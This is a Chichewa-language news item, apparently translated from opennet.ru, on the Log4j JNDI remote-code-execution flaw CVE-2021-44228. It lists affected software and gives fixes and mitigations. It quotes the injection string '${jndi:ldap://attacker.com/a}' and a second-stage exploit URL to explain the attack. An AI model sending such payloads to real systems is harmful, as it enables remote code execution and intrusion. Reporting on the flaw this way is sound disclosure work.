Mu Apache Log4j, chimango chodziwika bwino chokonzekera kudula mitengo mu mapulogalamu a Java, chiwopsezo chachikulu chadziwika chomwe chimalola kuti code ichitidwe ngati mtengo wopangidwa mwapadera mu "{jndi:URL}" walembedwa pa chipika. Kuwukiraku kumatha kuchitidwa pa mapulogalamu a Java omwe amalemba mitengo yolandilidwa kuchokera kunja, mwachitsanzo, powonetsa zovuta m'mauthenga olakwika.
Zikudziwika kuti pafupifupi mapulojekiti onse omwe amagwiritsa ntchito machitidwe monga Apache Struts, Apache Solr, Apache Druid kapena Apache Flink amakhudzidwa ndi vutoli, kuphatikizapo Steam, Apple iCloud, Minecraft makasitomala ndi maseva. Zikuyembekezeka kuti chiwopsezochi chikhoza kuyambitsa chiwopsezo chachikulu pazantchito zamabizinesi, kubwereza mbiri yachiwopsezo chachikulu mu dongosolo la Apache Struts, lomwe, malinga ndi kuyerekezera koyipa, limagwiritsidwa ntchito pa intaneti ndi 65% ya Fortune. Makampani a 100. Kuphatikizapo kuyesa kuyang'ana maukonde kwa machitidwe osatetezeka.
Vutoli likukulirakulira chifukwa chakuti ntchito yogwira ntchito idasindikizidwa kale, koma kukonza kwa nthambi zokhazikika sikunapangidwebe. Chizindikiritso cha CVE sichinapatsidwebe. Kukonzekera kumangophatikizidwa munthambi yoyesera ya log4j-2.15.0-rc1. Monga njira yothetsera kusatetezeka, tikulimbikitsidwa kuti muyike parameter ya log4j2.formatMsgNoLookups kukhala yowona.
Vutoli lidayamba chifukwa chakuti log4j imathandizira kukonza masks apadera "{}" mumizere yotuluka pa chipika, momwe mafunso a JNDI (Java Naming ndi Directory Interface) amatha kuchitidwa. Kuwukiraku kumafika podutsa chingwe ndikulowetsa "${jndi:ldap://attacker.com/a}", ikakonzedwa kuti log4j idzatumiza pempho la LDAP la njira yopita ku gulu la Java kupita ku seva ya attacker.com. . Njira yobwezeredwa ndi seva ya wowukirayo (mwachitsanzo, http://second-stage.attacker.com/Exploit.class) idzakwezedwa ndikuchitidwa mogwirizana ndi zomwe zikuchitika pano, zomwe zimalola wowukirayo kuti apereke code mosasamala pa dongosolo ndi ufulu wa ntchito panopa.
Zowonjezera 1: Chiwopsezo chapatsidwa chizindikiritso CVE-2021-44228.
Zowonjezera 2: Njira yodutsa chitetezo chowonjezeredwa ndi kumasulidwa log4j-2.15.0-rc1 yadziwika. Kusintha kwatsopano, log4j-2.15.0-rc2, kwaperekedwa ndi chitetezo chokwanira ku chiwopsezo. Khodiyo ikuwonetsa kusintha komwe kumakhudzana ndi kusakhalapo kwa kuchotsedwa kwachilendo pakugwiritsa ntchito ulalo wolakwika wa JNDI.
Source: opennet.ru